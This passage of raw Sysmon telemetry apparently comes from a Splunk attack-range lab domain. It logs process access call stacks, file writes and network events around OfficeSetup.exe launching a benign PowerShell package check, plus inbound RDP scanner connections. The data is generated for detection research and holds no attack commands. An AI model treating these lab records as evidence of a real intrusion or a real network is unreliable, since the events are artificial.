14:53:35.925{A7A01FEF-B626-607E-1300-00000000BB01}12644440C:\Windows\System32\svchost.exe{A7A01FEF-EAEF-607E-6B0B-00000000BB01}1580C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.910{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.910{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.910{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.910{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.910{A7A01FEF-C0A3-607E-6C05-00000000BB01}36242592C:\Windows\system32\csrss.exe{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.910{A7A01FEF-EAEC-607E-660B-00000000BB01}68406800C:\Temp\OfficeSetup.exe{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\System32\windows.storage.dll+124156(wow64)|C:\Windows\System32\windows.storage.dll+123e11(wow64)|C:\Windows\System32\windows.storage.dll+123ee3(wow64)|C:\Windows\System32\windows.storage.dll+124bb5(wow64)|C:\Windows\System32\windows.storage.dll+123a61(wow64)|C:\Windows\System32\windows.storage.dll+125db0(wow64)|C:\Windows\System32\windows.storage.dll+12602c(wow64)|C:\Windows\System32\windows.storage.dll+125915(wow64)|C:\Windows\System32\SHELL32.dll+1a8264(wow64)|C:\Windows\System32\SHELL32.dll+1a813e(wow64)|C:\Windows\System32\SHELL32.dll+1a7f39(wow64) 154100x800000000000000063068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.921{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile "$package = Get-AppxPackage Microsoft.Office.Desktop -allUsers; if (!$package) { $Error.Add(\"Package is not installed\")}; if ($error.Count -eq 0) { Out-File -FilePath 'C:\Users\ADMINI~1\AppData\Local\Temp\Office.ValidateResult.scratch' -InputObject '1' -Encoding ascii; } else { Out-File -FilePath 'C:\Users\ADMINI~1\AppData\Local\Temp\Office.ValidateResult.scratch' -InputObject '0' -Encoding ascii; Out-File -FilePath 'C:\Users\ADMINI~1\AppData\Local\Temp\Office.ValidateError.scratch' -InputObject $error -Encoding ascii;} "C:\Temp\ATTACKRANGE\Administrator{A7A01FEF-C0A5-607E-58C6-320000000000}0x32c6582HighMD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA,IMPHASH=5E0145CEF36FA9BFBA7DE33AA683B8ED{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe"C:\Temp\OfficeSetup.exe" 10341000x800000000000000063067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.910{A7A01FEF-B626-607E-1300-00000000BB01}12644440C:\Windows\System32\svchost.exe{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000063066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.910{A7A01FEF-EAEC-607E-660B-00000000BB01}6840ATTACKRANGE\AdministratorC:\Temp\OfficeSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\Office.ValidateResult.scratchMD5=21438EF4B9AD4FC266B6129A2F60DE29,SHA256=13BF7B3039C63BF5A50491FA3CFD8EB4E699D1BA1436315AEF9CBE5711530354,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.910{A7A01FEF-EAEC-607E-660B-00000000BB01}6840ATTACKRANGE\AdministratorC:\Temp\OfficeSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\Office.ValidateError.scratchMD5=BD3457E50947D4280734E74B51B5B68D,SHA256=23D647979BC5DC186DE5BA3E00A222A912AB8E4782EB6407EFA70E29E95979F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.894{A7A01FEF-EAED-607E-670B-00000000BB01}3712ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:34.050{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-48670-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.985{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51410-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 22542200x800000000000000063061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.620{A7A01FEF-EAEC-607E-660B-00000000BB01}6840ecs.office.com0type: 5 ecs.office.trafficmanager.net;type: 5 s-0005-office.config.skype.com;type: 5 ecs-office.s-0005.s-msedge.net;type: 5 s-0005.s-msedge.net;::ffff:52.113.194.132;C:\Temp\OfficeSetup.exe 23542300x800000000000000063060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.566{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=71C8CCEF18B0AF1E49D6992323CAEC35,SHA256=BAB8A3E7F86427C5C2F7785EA99C978BB1A5ADA546E8A936E0D20BBCC92C896D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.472{A7A01FEF-B624-607E-0A00-00000000BB01}8525304C:\Windows\system32\services.exe{A7A01FEF-EAEF-607E-690B-00000000BB01}1188C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.472{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EAEF-607E-690B-00000000BB01}1188C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.363{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EAEF-607E-690B-00000000BB01}1188C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.363{A7A01FEF-B624-607E-0A00-00000000BB01}8526268C:\Windows\system32\services.exe{A7A01FEF-EAEF-607E-690B-00000000BB01}1188C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.363{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.363{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.363{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.363{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000063051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.222{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A99CA294B52475957D99EDD65B00B299,SHA256=ADA2EF8BA56782BC07D03C7E6640F9E10D13EBFAC2F5DE8AAB63F89E0AA707B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049278Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:35.270{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F42EDF462BBDA5143E4628B3B319F397,SHA256=FFB655D07CBEFD38A8215F06680E92DB04239235EF58982716C3A55B87F63906,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.160{A7A01FEF-EAED-607E-670B-00000000BB01}3712ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qpxfzawg.oyj.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.160{A7A01FEF-EAED-607E-670B-00000000BB01}3712ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_xfnenbg4.5em.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:35.144{A7A01FEF-EAED-607E-670B-00000000BB01}3712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_xfnenbg4.5em.ps12021-04-20 14:53:35.144 354300x800000000000000063047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.655{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57446-false52.113.194.132-443https 354300x800000000000000063046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.653{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57445-false52.109.88.34-443https 354300x800000000000000063045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.617{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local58167- 354300x800000000000000063044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.617{A7A01FEF-B626-607E-1400-00000000BB01}1276C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53036-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domain 354300x800000000000000063043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:33.320{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com51836-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049280Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:36.728{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BA4807D437FD0000494AB9F1DF33417,SHA256=F6416CE5ED7798273B928C6F36C86161B89578B9C0621A7375070B1C8A6A6866,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.988{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BIT576D.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.988{A7A01FEF-B626-607E-1600-00000000BB01}15402648C:\Windows\system32\svchost.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x800000000000000063137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 